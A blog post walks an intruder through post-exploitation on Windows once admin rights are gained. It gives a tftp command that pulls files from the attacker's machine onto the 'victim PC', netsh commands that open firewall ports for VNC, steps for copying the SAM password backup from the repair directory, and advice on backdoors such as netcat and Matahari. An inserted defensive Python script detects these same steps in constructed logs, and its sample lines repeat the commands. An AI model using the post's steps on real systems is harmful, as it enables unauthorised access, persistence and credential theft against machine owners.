In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s a lot you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.
Anyhow, once you get in, open a Windows command shell.
Here are a few things you might like to do:
1) Uploading/downloading files
The first thing you might do is upload a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start the TFTP service/daemon on your PC first and place the files you want to upload in the program’s working directory. On most Linux versions, that’s /tmp.
Type the following command to upload the netsh.exe file:
C:\WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe
Here:
-i specifies binary transfer mode
GET tells the victim PC to fetch the file from the remote PC. You can use PUT to copy data onto a remote PC.
192.168.1.10 is your IP
The first netsh.exe is the file you want to upload
The second netsh.exe is the filename you want to keep on the victim PC. You can change it to anything you want.
2) Editing network settings
The file netsh.exe is a Windows program for editing network-related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall that might otherwise be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall settings to unblock these ports by using these commands:
netsh firewall set portopening tcp 5800
netsh firewall set portopening tcp 5900
netsh.exe firewall set portopening udp 5900
This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use unless the telnet service is started on that PC.
3) Copying SAM
The SAM file contains a list of all the users and their corresponding passwords in Windows. Though its encryption can be hard to break, depending upon password strength, it’s a very juicy target. There are quite a few paid and free programs to do that. Its default location is
C:\windows\system32\config
It’s not possible to copy the SAM file directly, as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in
C:\windows\repair
You can copy this file to your own PC, unlike the original SAM.
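Before moving on, an added example that is not part of the original post: a small Python script, written from the defender’s side, that scans process-creation command lines for the three steps described above (binary TFTP transfers, netsh firewall port openings, reads of the SAM backup in the repair directory) and flags hosts where more than one of them appears. The key=value log format and the sample records are constructed for the example, not real telemetry.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records in a simple key=value export
# (the shape a 4688/Sysmon collector might emit); not telemetry from any host.
SAMPLE_LOG = [
    "host=ws01 user=alice cmd=tftp -i 192.168.1.10 GET netsh.exe netsh.exe",
    "host=ws01 user=alice cmd=netsh firewall set portopening tcp 5900",
    "host=ws01 user=alice cmd=copy C:\\windows\\repair\\sam C:\\temp\\sam.bak",
    "host=ws02 user=bob cmd=ping 10.0.0.1",
    "host=ws02 user=svc cmd=netsh interface show interface",
]

RECORD = re.compile(r"^host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# One rule per step described in the post; each matches the command line only.
RULES = [
    ("tftp binary transfer",
     re.compile(r"\btftp(?:\.exe)?\b.*\s-i\s.*\b(?:GET|PUT)\b", re.I)),
    ("firewall port opened via netsh",
     re.compile(r"\bnetsh(?:\.exe)?\s+firewall\s+set\s+portopening\b", re.I)),
    ("SAM backup read from repair directory",
     re.compile(r"\\windows\\repair\\sam\b", re.I)),
]


def scan(lines):
    """Return (host, user, rule name) for every command line that hits a rule."""
    findings = []
    for line in lines:
        m = RECORD.match(line)
        if not m:
            continue  # skip lines that are not in the expected export shape
        for name, pattern in RULES:
            if pattern.search(m.group("cmd")):
                findings.append((m.group("host"), m.group("user"), name))
    return findings


def chained_hosts(findings, min_techniques=2):
    """(host, user) pairs that show several of the post's steps, not just one."""
    seen = defaultdict(set)
    for host, user, name in findings:
        seen[(host, user)].add(name)
    return sorted(key for key, names in seen.items() if len(names) >= min_techniques)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for host, user, name in hits:
        print(f"{host} {user}: {name}")
    print("chained:", chained_hosts(hits))
```

A single hit from any rule is worth a look; the same host and user hitting two or more rules in a short window is the pattern the post describes and deserves an immediate investigation.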
4) Uploading a back-door
A back-door program, for example netcat, is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily, so it’s slightly out of fashion. If that’s the case, you can try using some script-based back-doors like Matahari. It’s a Perl script. The only downside is that the target PC should have Perl installed, which most Windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.
That’s enough for now. Let me know if you have any suggestions or corrections.